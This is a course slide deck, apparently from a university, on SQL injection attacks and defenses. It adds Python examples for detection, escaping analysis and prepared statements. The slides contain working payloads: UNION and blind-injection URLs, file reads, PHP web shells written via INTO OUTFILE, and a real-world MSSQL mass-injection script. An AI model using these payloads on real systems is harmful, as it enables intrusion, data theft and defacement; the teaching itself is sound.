Server-Side Attacks and Defenses I, 1020307
2. Server-Side Attacks and Defenses I - Outline
• SQL Injection
– Attack techniques
• Testing whether a vulnerability exists
• Commonly used functions
• UNION
• Bypassing escaped characters
– ASCII encoding
– Hexadecimal encoding
– Double-byte escape bypass
– SQL Blind Injection
• Time-Based Blind SQL Injection
– SQL Column Truncation
3. SQL Injection - Introduction
• Rfp, "NT Web Technology Vulnerabilities", Phrack, 1998
• Wikipedia
– SQL injection (SQL注入攻擊 in mainland Chinese usage, 隱碼攻擊 for short in Taiwan) is a security vulnerability at the database layer of an application. In short, SQL commands are smuggled inside an input string; when a poorly designed program fails to check the input, the database server mistakes the smuggled commands for legitimate SQL and executes them, and the database is compromised as a result.
6. SQL Injection Attack Techniques - Quick Tests for a Vulnerability
• http://www.hackdemo.com/getUser.php?id=1
• http://www.hackdemo.com/getUser.php?id=
• http://www.hackdemo.com/getUser.php?id=999999.9
• http://www.hackdemo.com/getUser.php?id=1'
• http://www.hackdemo.com/getUser.php?id=1+and+1=1
• http://www.hackdemo.com/getUser.php?id=1+and+1=2
7. SQL Injection Attack Techniques - Whitespace and Comments
• Mixed-case keywords
• Comments
#(%23), /*, --
• Whitespace
+, /**/
URL encoding   Meaning
%09            horizontal tab
%0a            line feed
%0b            vertical tab
%0c            form feed
%0d            carriage return
%20            space
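Added example (not part of the slides): a log-side normalizer that undoes the evasions listed on slides 6 and 7 (URL encoding, + and /**/ standing in for spaces, the %09 to %0d whitespace variants, keyword case) before matching, so one small rule set catches every probe form shown above. The request lines, paths and rule names are constructed for this demo; the attack strings inside them are the ones on the slides.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines (not taken from any real log). The query strings
# reproduce the probe forms on slides 6 and 7, plus the whitespace/comment
# variants (%0a, %09, /**/, mixed case) that are meant to defeat naive filters.
SAMPLE_REQUESTS = [
    "GET /getUser.php?id=1 HTTP/1.1",
    "GET /getUser.php?id=999999.9 HTTP/1.1",
    "GET /getUser.php?id=1' HTTP/1.1",
    "GET /getUser.php?id=1+and+1=1 HTTP/1.1",
    "GET /getUser.php?id=1+and+1=2+UNION+SELECT+1,2,3,4%23 HTTP/1.1",
    "GET /searchUser.php?name=h%'/**/aNd/**/1=2/**/uNiOn/**/select/**/1,2,3,user()%23 HTTP/1.1",
    "GET /getUser.php?id=1%0aAND%09LENGTH(PASSWORD)=7%23 HTTP/1.1",
]

# Rules run against the *normalized* value, so keyword case, /**/ and the
# %09-%0d whitespace bytes no longer matter. Rule order fixes finding order.
RULES = [
    ("tautology",      re.compile(r"\b(and|or) \d+ ?= ?\d+")),
    ("union_select",   re.compile(r"\bunion (all )?select\b")),
    ("probe_function", re.compile(r"\b(length|left|right|substring|substr|mid|"
                                  r"load_file|benchmark|sleep|version|user|database)\(")),
    ("comment_tail",   re.compile(r"#|--")),
    ("quote",          re.compile(r"'")),
]


def normalize(raw_value: str) -> str:
    """Undo the encoding choices an attacker controls, so one rule set suffices."""
    value = unquote_plus(raw_value)                       # '+' and %xx: %23 -> '#', %0a -> LF, %09 -> TAB
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # inline comments used as spaces
    value = re.sub(r"\s+", " ", value)                    # TAB, LF, VT, FF, CR -> one space
    return value.strip().lower()                          # mixed-case keywords


def analyze(request_line: str) -> dict:
    """Map each query parameter of a request line to the list of rules it trips."""
    _, target, *_ = request_line.split(" ")
    query = target.partition("?")[2]
    report = {}
    for pair in query.split("&"):
        name, _, raw_value = pair.partition("=")  # split on the first '=' only
        norm = normalize(raw_value)
        report[unquote_plus(name)] = [label for label, rx in RULES if rx.search(norm)]
    return report


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(analyze(line), "<-", line)
```

The first two requests (a normal id and an out-of-range number) produce no findings; everything from the lone quote onward does, and the /**/ and %0a/%09 variants are flagged exactly like their plain-space equivalents.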
8. SQL Injection Attack Techniques - Functions Commonly Used for Guessing Data
Function                      Purpose
LENGTH(str)                   returns the length of the string
LEFT(str,len)                 returns the leftmost len characters of str
RIGHT(str,len)                returns the rightmost len characters of str
SUBSTRING(str,pos,len)        returns a substring of str
SUBSTR(str,pos,len)           synonym for SUBSTRING
MID(str,pos,len)              synonym for SUBSTRING
CHAR(N,... [USING charset])   returns a string made of the characters whose integer codes are given
HEX(N_or_S)                   if N_or_S is a number, returns its hexadecimal string representation
ASCII(str)                    returns the numeric code of the leftmost character of str
CONCAT(str1,str2,...)         returns the string formed by concatenating all arguments
NAME_CONST(name,value)        returns the given value; when used to produce a result-set column, NAME_CONST() gives that column the given name. From 5.1 on, both arguments must be constants
…
9. SQL Injection Attack Techniques - Related System Functions
Function                                 Purpose
LOAD_FILE(file_name)                     reads a file
INTO OUTFILE '/var/www/html/back.php'    writes query output to a file
VERSION()                                returns the MySQL server version
DATABASE()                               name of the database currently in use
USER()                                   returns the current MySQL user name and host name
SYSTEM_USER()                            synonym for USER()
SESSION_USER()                           synonym for USER()
SCHEMA()                                 synonym for DATABASE()
CURRENT_USER()                           returns the user name and host name combination the server authenticated, which may differ from USER()
@@DATADIR                                path of the database data directory
@@BASEDIR                                path of the database installation
…
10. SQL Injection Attack Techniques - Notes on Reading Files
• The file to read must be on the database server
• The full path of the file must be given
• The database user must have the privilege to read it, and the file must be readable by all
• The file must be smaller than max_allowed_packet
11. SQL Injection Attack Techniques - UNION
• PHP+MySQL does not support stacked (multi-statement) queries, so the UNION set operation is used instead
– Vulnerable SQL with an unquoted parameter (PHP example)
• SELECT * FROM `member` WHERE `id` =$id
– Attack example for the unquoted parameter
• http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNION+SELECT+1,2,3,4#
– Statement actually executed
• SELECT * FROM `member` WHERE `id` =1 AND 1=2 UNION SELECT 1,2,3,4#
12. SQL Injection Attack Techniques - UNION
• PHP+MySQL does not support stacked (multi-statement) queries, so the UNION set operation is used instead
• Vulnerable SQL with a quoted parameter (PHP example)
• SELECT * FROM `member` WHERE `name` like '" . $name . "%'
• Attack example for the quoted parameter
• http://www.hackdemo.com/searchUser.php?name=h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()%23
• Statement actually executed
• SELECT * FROM `member` WHERE `name` like 'h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#%'
14. SQL Injection Attack Techniques - Guessing Data
• Finding the length
– http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=1#
– …
– http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=7#
• Guessing the data
– http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='a'#
– …
– http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='w'#
15. SQL Injection Attack Techniques - Reading and Writing Files
• Dumping data to a file
– http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:/Website/www.hackdemo.com/member.txt'
• Writing a backdoor
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+into+outfile+'D:/Website/www.hackdemo.com/cmd.php'
17. SQL Blind Injection
• SQL blind injection is another form of SQL injection. Ordinary SQL injection relies on the error messages that come back to build the attack syntax; blind injection relies entirely on whether the injected condition evaluates true or false.
• SQL Blind Injection
– Ordinary blind injection
– Time-Based Blind SQL Injection
18. Time-Based Blind SQL Injection (1/2)
• Uses a time delay to tell whether the injected SQL executed
• Techniques
– Built-in functions
• BENCHMARK(COUNT, EXPR)
• SLEEP(seconds)
– MySQL >= 5
– Constructing statements that take a long time to run (heavy queries)
20. Time-Based Blind SQL Injection - Guessing the Database Name via Time Delay
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
• …
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
21. SQL Injection Attack Techniques - Bypassing Escaped Characters
• ASCII encoding
– ASCII(), CHAR()
– Single character
• CHAR(68)
– Multiple characters
• CHAR(68, 58, 92)
• Hexadecimal encoding
– HEX()
– 0x443A5C
• Double-byte escape bypass
22. SQL Injection Attack Techniques - Guessing Data (Bypassing Escaping)
• Guessing table and field names
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guessing field data
– http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
– …
– http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
23. SQL Injection Attack Techniques - Reading Data (Bypassing Escaping)
• Reading data from files
– http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
– http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
24. SQL Injection Attack Techniques - Writing Files (When the Quote Restriction Cannot Be Bypassed)
1. Find phpMyAdmin
2. Connect to MySQL remotely
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a decodes to
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php';
The file written is
<?php @eval($_POST['cmd']);?>
25. SQL Injection Attack Techniques - Double-Byte Escape Bypass (1/3)
• An injected encoded lead byte and the backslash (%5c) inserted by escaping recombine into one double-byte character, leaving the ' unescaped and bypassing the escape restriction
• Scenario
– Escaping is done by
• addslashes
• mysql_escape_string
• php.ini
– magic_quotes_gpc enabled
– Big5 or GBK encoding in use
• set names gbk, set names big5
26. SQL Injection Attack Techniques - Double-Byte Escape Bypass (2/3)
• Chinese text is represented as two bytes per character
– Big5:
• High byte: 0x81-0xFE; low byte: 0x40-0x7E, 0xA1-0xFE
– GBK:
• Lead byte: 0x81-0xFE; trail byte: 0x40-0x7E
– GB2312:
• Lead byte: 0xB0-0xF7; trail byte: 0xA0-0xFE
– Attack bytes: %BF, %CC, %D5…
27. SQL Injection Attack Techniques - Double-Byte Escape Bypass (3/3)
• Bypassing escaping on a quoted parameter
– http://www.hackdemo.com/searchUserLash.php?name=h%%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
– http://www.hackdemo.com/searchUserLash.php?name=h%%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
– http://www.hackdemo.com/searchUserLash.php?name=h%%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
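Added example (not from the slides): why byte-wise escaping is defeated by the lead bytes on slide 26 under GBK, and why the advice on slide 33 to use UTF-8 holds. Assumptions: escaping is a PHP addslashes()/mysql_escape_string()-style byte loop, and the server reads the escaped bytes in the charset chosen by SET NAMES; the functions `addslashes`, `quote_still_escaped`, `escape_as_text` and the sample bytes are constructed for this demo.

```python
def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): a backslash (0x5C) is placed in
    front of ' " \\ and NUL without looking at the surrounding bytes."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_still_escaped(param: bytes, charset: str) -> bool:
    """Escape the raw parameter bytes, then read the result back the way the
    server does (as characters of the connection charset). True means the
    quote is still preceded by a backslash character after decoding."""
    text = addslashes(param).decode(charset, errors="replace")
    idx = text.rfind("'")
    return idx > 0 and text[idx - 1] == "\\"


def escape_as_text(param: bytes, charset: str) -> bytes:
    """Charset-aware escaping: decode the input as text first (a stray lead
    byte such as 0xBF does not decode and is rejected), escape characters
    rather than bytes, then re-encode for the connection."""
    text = param.decode(charset)  # strict: raises UnicodeDecodeError on malformed input
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)


# Constructed input: "h%", the 0xBF lead byte from slide 26, then a quote.
STRAY_LEAD_BYTE_INPUT = b"h%\xbf'"

if __name__ == "__main__":
    for charset in ("gbk", "big5", "utf-8"):
        print(charset, "quote still escaped:", quote_still_escaped(STRAY_LEAD_BYTE_INPUT, charset))
    print(escape_as_text("h%'".encode("gbk"), "gbk"))
```

Under GBK the pair 0xBF 0x5C decodes to a single character and the quote that follows is bare; under UTF-8 every byte of a multibyte sequence is 0x80 or above, so the ASCII backslash can never be absorbed into a character. That is the reason behind the UTF-8 recommendation on slide 33; on a legacy charset, charset-aware escaping (mysqli_real_escape_string after mysqli_set_charset) or, better, prepared statements close the gap.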
28. SQL Column Truncation - Introduction (1/3)
• MySQL SQL mode
– STRICT_ALL_TABLES not enabled
• Inserting data longer than the column produces a warning
• But the (truncated) data is still inserted
– STRICT_ALL_TABLES enabled
• Inserting data longer than the column produces a message
• ERROR 1406 is raised and the row is not inserted
• Incident
– 2008-09-07
• WordPress 2.6.1 SQL Column Truncation Vulnerability
30. SQL Column Truncation - Defenses (3/3)
• Actively strip whitespace from strings that should not contain it
– e.g. account names
• Add BINARY when SELECTing the data
• Configure MySQL to compare with BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
– Data exceeding the column length raises an ERROR instead of a WARNING
– To avoid errors on insert, extra checks may be needed in the insert and update code
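Added example (not from the slides): a small Python model of the MySQL behaviour described on slides 28 and 30, used to check each of the three defenses above. The varchar(16) column width, the function names and the two sample account names are constructed; the model assumes that non-strict mode truncates with a warning, that STRICT_ALL_TABLES raises an error, and that a non-BINARY comparison ignores trailing spaces while BINARY compares exact bytes.

```python
import re
import warnings

COLUMN_WIDTH = 16  # constructed: the login column is varchar(16)


class ColumnTruncationError(Exception):
    """Stands in for MySQL ERROR 1406 (data too long) under STRICT_ALL_TABLES."""


def store_account_name(value: str, strict_all_tables: bool) -> str:
    """Model of what the column holds after an INSERT (slide 28)."""
    if len(value) <= COLUMN_WIDTH:
        return value
    if strict_all_tables:
        raise ColumnTruncationError(f"data too long for column (width {COLUMN_WIDTH})")
    warnings.warn("data truncated for column")  # non-strict: warning only, row still written
    return value[:COLUMN_WIDTH]


def equal_default(stored: str, probe: str) -> bool:
    """Non-BINARY string comparison: trailing spaces are not significant."""
    return stored.rstrip(" ") == probe.rstrip(" ")


def equal_binary(stored: str, probe: str) -> bool:
    """Comparison with the BINARY operator: byte for byte."""
    return stored == probe


def validate_account_name(value: str) -> str:
    """Application-side check from slide 30: no whitespace anywhere in an
    account name and never longer than the column, so nothing is silently
    truncated and two names can never collide after truncation."""
    if len(value) > COLUMN_WIDTH:
        raise ValueError("account name longer than column width")
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", value):
        raise ValueError("account name contains whitespace or disallowed characters")
    return value


# Constructed inputs: a legitimate name and an over-long name whose first 16
# characters are "admin" padded with spaces.
LEGIT_NAME = "admin"
OVERLONG_NAME = "admin" + " " * 11 + "x"   # 17 characters

if __name__ == "__main__":
    stored = store_account_name(OVERLONG_NAME, strict_all_tables=False)
    print("stored as       :", repr(stored))
    print("default compare :", equal_default(stored, LEGIT_NAME))   # collides with "admin"
    print("BINARY compare  :", equal_binary(stored, LEGIT_NAME))    # does not
    for name in (LEGIT_NAME, OVERLONG_NAME):
        try:
            print("validate:", validate_account_name(name))
        except ValueError as e:
            print("validate:", e)
```

Without any of the defenses the truncated row compares equal to the existing account under the default collation; BINARY, strict mode and the whitespace check each break that on their own, and the whitespace check is the one that keeps the error out of the insert path.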
31. SQL Injection - Further Thoughts
• Can INSERT and UPDATE statements be attacked?
• Is NoSQL free of SQL injection?
• Other ways to exploit
– Deep Blind Injection
– Error-Based Injection
• Duplicate-key error
• Function
– information_schema
– User-Defined Functions
– Triggers
33. Defending Against SQL Injection Correctly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid Big5 and GBK
• Check data types and cast explicitly
– bool settype(mixed &$var, string $type)
– intval, doubleval...
• Use safe encoding functions
– OWASP ESAPI
• MySQLCodec
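Added example (not the deck's own code) serving slide 11 and this slide: the unquoted-id query from slide 11 built by string concatenation, beside the prepared-statement and type-check defenses listed here. It uses Python's sqlite3 module as a stand-in for PHP+MySQL, so the comment terminator is `--` (as on slide 22) rather than `#`; the table rows and the names `make_db`, `get_user_vulnerable`, `get_user_prepared`, `parse_id` and `get_user_safe` are constructed for the demo.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory `member` table with constructed rows (four columns, as on slide 11)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (id INTEGER, name TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?, ?, ?)",
                     [(1, "alice", "s3cret", "alice@example.test"),
                      (2, "bob", "hunter2", "bob@example.test")])
    return conn


def get_user_vulnerable(conn, id_param: str):
    """The slide-11 pattern: the parameter becomes part of the statement text."""
    sql = "SELECT * FROM member WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def get_user_prepared(conn, id_param: str):
    """Prepared statement: the SQL is compiled first and the parameter is bound
    afterwards as a value, so it can never change the statement's structure."""
    return conn.execute("SELECT * FROM member WHERE id = ?", (id_param,)).fetchall()


def parse_id(id_param: str) -> int:
    """Type check and cast (the intval/settype idea from slide 33, made strict:
    anything but a plain decimal number is rejected rather than coerced)."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError(f"id must be a positive integer, got {id_param!r}")
    return int(id_param)


def get_user_safe(conn, id_param: str):
    """Both defenses together: validate the type, then bind the value."""
    return conn.execute("SELECT * FROM member WHERE id = ?", (parse_id(id_param),)).fetchall()


# Constructed inputs: a normal request and the UNION payload from slide 22.
NORMAL_ID = "1"
UNION_PAYLOAD = "1 AND 1=2 UNION SELECT 1,2,3,4--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable :", get_user_vulnerable(db, UNION_PAYLOAD))  # attacker-chosen row comes back
    print("prepared   :", get_user_prepared(db, UNION_PAYLOAD))    # no row: the payload is only a string
    try:
        get_user_safe(db, UNION_PAYLOAD)
    except ValueError as e:
        print("type check :", e)
```

The concatenated query returns the row the payload selected; with a bound parameter the same string is compared to the id column as data and matches nothing, and the type check rejects it before any query runs.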
34. MSSQL Real-World Case - Automated Injection from 116jurist.ru (1/4)
• 2012.12.xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
35. MSSQL Real-World Case - Automated Injection from 116jurist.ru (2/4)
• 2012.12.xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(@s)--
36. MSSQL Real-World Case - Automated Injection from 116jurist.ru (3/4)
• 2012.12.xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(@s)--
37. MSSQL Real-World Case - Automated Injection from 116jurist.ru, Decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+']
like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}<
/style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
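Added example (not from the slides): a decoder for the wrapper on slides 34 to 36, where the real SQL is hidden as a hex literal inside cast(0x... as varchar(8000)) and run through exec(@s), which is the step slide 37 shows done by hand. The access-log line, client address and path are constructed; the hex literal is the first 45 bytes of the slide-34 payload. The nvarchar branch (UTF-16LE) goes beyond the slides, which show only varchar.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log entry (client address and path are invented). The hex
# is the opening of the slide-34 payload, cut short to keep the sample readable;
# it decodes to "set ansi_warnings off DECLARE @T VARCHAR(255)".
SAMPLE_LOG = (
    '203.0.113.7 - - [xx/Dec/2012:10:03:31 +0800] "GET /news.asp?Serno=51+declare+@s+varchar(8000)'
    '+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c41524520405420'
    '564152434841522832353529+as+varchar(8000))+exec(@s)-- HTTP/1.1" 200 1532'
)

REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_CAST = re.compile(r"cast\(0x([0-9a-f]+) as (n?varchar)\(\d+\)\)", re.I)
# declare @x varchar(n) ... exec(@x): the same variable is declared and executed
EXEC_WRAPPER = re.compile(r"\bdeclare @(\w+) n?varchar\(\d+\).*\bexec\(@\1\)", re.I | re.S)


def decode_hex_literal(hex_digits: str, sql_type: str) -> str:
    """MSSQL varchar holds single-byte text (decoded as latin-1, which is how
    slide 37 rendered it); nvarchar holds UTF-16LE code units."""
    raw = bytes.fromhex(hex_digits)
    if sql_type.lower().startswith("n"):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def inspect_log_line(line: str) -> dict:
    """Return the URL-decoded request target, whether the declare/exec wrapper
    is present, and every hex-cast literal decoded to readable SQL."""
    m = REQUEST_TARGET.search(line)
    if not m:
        return {"target": None, "hex_exec_wrapper": False, "decoded_sql": []}
    target = unquote_plus(m.group(1))
    decoded = [decode_hex_literal(h, t) for h, t in HEX_CAST.findall(target)]
    return {
        "target": target,
        "hex_exec_wrapper": EXEC_WRAPPER.search(target) is not None,
        "decoded_sql": decoded,
    }


if __name__ == "__main__":
    report = inspect_log_line(SAMPLE_LOG)
    print("wrapper present:", report["hex_exec_wrapper"])
    for sql in report["decoded_sql"]:
        print("decoded:", sql)
```

Run over the full hex strings on slides 34 to 36, the decoder yields the three cursor scripts reproduced on slide 37; the wrapper check alone is a cheap first-pass signature for this family of mass-injection requests, independent of what the hex contains.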
38. References
• 吳翰清 (Wu Hanqing), 網路竟然這麼危險 (白帽子讲Web安全), 2012
• MySQL, String Functions, 5.1
• MySQL, Miscellaneous Functions, 5.1
• MySQL/PHP: generating a one-line shell with load_file/outfile when single quotes are escaped (MySQL/PHP 对单引号转义时load_file/outfile 生成一句话)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008